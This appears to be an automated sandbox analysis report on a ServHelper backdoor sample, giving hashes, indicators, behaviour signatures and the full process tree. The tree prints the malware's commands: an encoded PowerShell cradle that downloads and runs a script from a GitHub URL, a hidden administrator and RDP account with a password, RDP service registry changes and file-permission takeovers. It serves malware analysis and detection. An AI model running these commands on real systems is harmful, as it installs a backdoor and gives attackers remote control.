Resubmissions
03-09-2021 08:44
210903-knkchscgf9 902-09-2021 11:39
210902-5qmqtqgzvs 916-07-2021 08:05
210716-56b3g8kfte 10Analysis
-
max time kernel
138s -
max time network
160s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
16-07-2021 08:05
Static task
static1
Behavioral task
behavioral1
Sample
96d4ecbc8b4e168039901376fc5a8b5a.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
96d4ecbc8b4e168039901376fc5a8b5a.exe
Resource
win10v20210410
General
-
Target
96d4ecbc8b4e168039901376fc5a8b5a.exe
-
Size
3.2MB
-
MD5
96d4ecbc8b4e168039901376fc5a8b5a
-
SHA1
133d86495e1b248253280bb10a24da1045a75594
-
SHA256
cfdb155368f72aed83e715260f1dd63922a25ce4e6d558941f94cb4a06357994
-
SHA512
b6d17596374d88b33e2331687ed70f85add4331d2d7b612a3da44907a79f356e619654378d327889e50e9908e86b96132c3bf395dff1a9f91ea2c3a536bc3c2f
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Core1 .NET packer 1 IoCs
Detects packer/loader used by .NET malware.
resource yara_rule behavioral1/memory/1832-63-0x000000001D020000-0x000000001D4D0000-memory.dmp Core1 -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 11 1640 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
pid Process 1420 icacls.exe 1568 takeown.exe 1040 icacls.exe 916 icacls.exe 972 icacls.exe 1612 icacls.exe 1156 icacls.exe 1868 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral1/files/0x00040000000130d5-191.dat upx behavioral1/files/0x00050000000130d6-192.dat upx -
Deletes itself 1 IoCs
pid Process 108 powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 1816 Process not Found 1816 Process not Found -
Modifies file permissions 1 TTPs 8 IoCs
pid Process 916 icacls.exe 972 icacls.exe 1612 icacls.exe 1156 icacls.exe 1868 icacls.exe 1420 icacls.exe 1568 takeown.exe 1040 icacls.exe -
Uses the VBS compiler for execution 1 TTPs
-
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1832 set thread context of 1464 1832 96d4ecbc8b4e168039901376fc5a8b5a.exe 29 -
Drops file in Windows directory 21 IoCs
description ioc Process File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6F4UI3SBDKDWZXLF6OE5.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4a81773a-e0f5-4ef2-a5f2-de34cb2668f9 powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3c6957e8-74a2-4f4b-8b9e-2ffbfad8b797 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_12908eca-b8cd-4d10-9e70-b04c291c2a5b powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_64d2041f-a5d4-4dd8-92d3-2eb7c2d51b76 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0ec32dbd-1587-46e9-acc0-1e69875e6ef2 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b55086d3-6cfa-4afe-84fa-fbdf99ff1f90 powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0e71c985-30fd-4844-891a-9288a609306a powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ff3ecd36-2613-4eb1-a33c-875f35a1a320 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c1f8df1b-d4ec-42fb-9abc-50ab680aeb3c powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9886f6e8-b83b-4a27-a7d7-b7bc9cf6b825 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_17a3f845-6047-4ed2-aa7e-24fd19e0ac39 powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0b3cfc92a7ad701 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1268 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 108 powershell.exe 108 powershell.exe 1268 powershell.exe 1268 powershell.exe 664 powershell.exe 664 powershell.exe 1564 powershell.exe 1564 powershell.exe 108 powershell.exe 108 powershell.exe 108 powershell.exe 1640 powershell.exe 1640 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
pid Process 488 Process not Found 1816 Process not Found 1816 Process not Found 1816 Process not Found 1816 Process not Found -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 108 powershell.exe Token: SeDebugPrivilege 1268 powershell.exe Token: SeDebugPrivilege 664 powershell.exe Token: SeDebugPrivilege 1564 powershell.exe Token: SeRestorePrivilege 916 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1680 WMIC.exe Token: SeIncreaseQuotaPrivilege 1680 WMIC.exe Token: SeAuditPrivilege 1680 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1680 WMIC.exe Token: SeIncreaseQuotaPrivilege 1680 WMIC.exe Token: SeAuditPrivilege 1680 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1672 WMIC.exe Token: SeIncreaseQuotaPrivilege 1672 WMIC.exe Token: SeAuditPrivilege 1672 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1672 WMIC.exe Token: SeIncreaseQuotaPrivilege 1672 WMIC.exe Token: SeAuditPrivilege 1672 WMIC.exe Token: SeDebugPrivilege 1640 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1832 wrote to memory of 1464 1832 96d4ecbc8b4e168039901376fc5a8b5a.exe 29 PID 1832 wrote to memory of 1464 1832 96d4ecbc8b4e168039901376fc5a8b5a.exe 29 PID 1832 wrote to memory of 1464 1832 96d4ecbc8b4e168039901376fc5a8b5a.exe 29 PID 1832 wrote to memory of 1464 1832 96d4ecbc8b4e168039901376fc5a8b5a.exe 29 PID 1832 wrote to memory of 1464 1832 96d4ecbc8b4e168039901376fc5a8b5a.exe 29 PID 1832 wrote to memory of 1464 1832 96d4ecbc8b4e168039901376fc5a8b5a.exe 29 PID 1832 wrote to memory of 1464 1832 96d4ecbc8b4e168039901376fc5a8b5a.exe 29 PID 1832 wrote to memory of 1464 1832 96d4ecbc8b4e168039901376fc5a8b5a.exe 29 PID 1832 wrote to memory of 1464 1832 96d4ecbc8b4e168039901376fc5a8b5a.exe 29 PID 1832 wrote to memory of 1464 1832 96d4ecbc8b4e168039901376fc5a8b5a.exe 29 PID 1832 wrote to memory of 1464 1832 96d4ecbc8b4e168039901376fc5a8b5a.exe 29 PID 1464 wrote to memory of 108 1464 vbc.exe 30 PID 1464 wrote to memory of 108 1464 vbc.exe 30 PID 1464 wrote to memory of 108 1464 vbc.exe 30 PID 108 wrote to memory of 1424 108 powershell.exe 32 PID 108 wrote to memory of 1424 108 powershell.exe 32 PID 108 wrote to memory of 1424 108 powershell.exe 32 PID 1424 wrote to memory of 1156 1424 csc.exe 33 PID 1424 wrote to memory of 1156 1424 csc.exe 33 PID 1424 wrote to memory of 1156 1424 csc.exe 33 PID 108 wrote to memory of 1268 108 powershell.exe 34 PID 108 wrote to memory of 1268 108 powershell.exe 34 PID 108 wrote to memory of 1268 108 powershell.exe 34 PID 108 wrote to memory of 664 108 powershell.exe 36 PID 108 wrote to memory of 664 108 powershell.exe 36 PID 108 wrote to memory of 664 108 powershell.exe 36 PID 108 wrote to memory of 1564 108 powershell.exe 38 PID 108 wrote to memory of 1564 108 powershell.exe 38 PID 108 wrote to memory of 1564 108 powershell.exe 38 PID 108 wrote to memory of 1568 108 powershell.exe 41 PID 108 wrote to memory of 1568 108 powershell.exe 41 PID 108 wrote to memory of 1568 108 powershell.exe 41 PID 108 wrote to memory of 1040 108 powershell.exe 42 PID 108 wrote to memory of 1040 108 powershell.exe 42 PID 108 wrote to memory of 1040 108 powershell.exe 42 PID 108 wrote to memory of 916 108 powershell.exe 43 PID 108 wrote to memory of 916 108 powershell.exe 43 PID 108 wrote to memory of 916 108 powershell.exe 43 PID 108 wrote to memory of 972 108 powershell.exe 44 PID 108 wrote to memory of 972 108 powershell.exe 44 PID 108 wrote to memory of 972 108 powershell.exe 44 PID 108 wrote to memory of 1612 108 powershell.exe 45 PID 108 wrote to memory of 1612 108 powershell.exe 45 PID 108 wrote to memory of 1612 108 powershell.exe 45 PID 108 wrote to memory of 1156 108 powershell.exe 46 PID 108 wrote to memory of 1156 108 powershell.exe 46 PID 108 wrote to memory of 1156 108 powershell.exe 46 PID 108 wrote to memory of 1868 108 powershell.exe 47 PID 108 wrote to memory of 1868 108 powershell.exe 47 PID 108 wrote to memory of 1868 108 powershell.exe 47 PID 108 wrote to memory of 1420 108 powershell.exe 48 PID 108 wrote to memory of 1420 108 powershell.exe 48 PID 108 wrote to memory of 1420 108 powershell.exe 48 PID 108 wrote to memory of 844 108 powershell.exe 49 PID 108 wrote to memory of 844 108 powershell.exe 49 PID 108 wrote to memory of 844 108 powershell.exe 49 PID 108 wrote to memory of 1268 108 powershell.exe 50 PID 108 wrote to memory of 1268 108 powershell.exe 50 PID 108 wrote to memory of 1268 108 powershell.exe 50 PID 108 wrote to memory of 1532 108 powershell.exe 51 PID 108 wrote to memory of 1532 108 powershell.exe 51 PID 108 wrote to memory of 1532 108 powershell.exe 51 PID 108 wrote to memory of 1608 108 powershell.exe 52 PID 108 wrote to memory of 1608 108 powershell.exe 52
Processes
-
C:\Users\Admin\AppData\Local\Temp\96d4ecbc8b4e168039901376fc5a8b5a.exe"C:\Users\Admin\AppData\Local\Temp\96d4ecbc8b4e168039901376fc5a8b5a.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'3⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:108 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\00rkaw0q\00rkaw0q.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES59C4.tmp" "c:\Users\Admin\AppData\Local\Temp\00rkaw0q\CSCDE699AA17EC0445089E23F476B61F798.TMP"5⤵PID:1156
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1568
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1040
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:972
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1612
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1156
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1868
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1420
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f4⤵PID:844
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f4⤵
- Modifies registry key
PID:1268
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f4⤵PID:1532
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵PID:632
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr4⤵PID:1548
-
C:\Windows\system32\cmd.execmd /c net start rdpdr5⤵PID:1604
-
C:\Windows\system32\net.exenet start rdpdr6⤵PID:1132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr7⤵PID:1652
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService4⤵PID:664
-
C:\Windows\system32\cmd.execmd /c net start TermService5⤵PID:1348
-
C:\Windows\system32\net.exenet start TermService6⤵PID:1844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService7⤵PID:1376
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f4⤵PID:272
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f4⤵PID:1680
-
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:1672
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:1156
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:1848
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc EI7nj2IQ /add1⤵PID:1912
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc EI7nj2IQ /add2⤵PID:1436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc EI7nj2IQ /add3⤵PID:1532
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:984
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:1112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1132
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD1⤵PID:1384
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD2⤵PID:596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD3⤵PID:1488
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:988
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:1016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1440
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc EI7nj2IQ1⤵PID:1912
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc EI7nj2IQ2⤵PID:1700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc EI7nj2IQ3⤵PID:1456
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1552
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1268
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1644
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:844
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-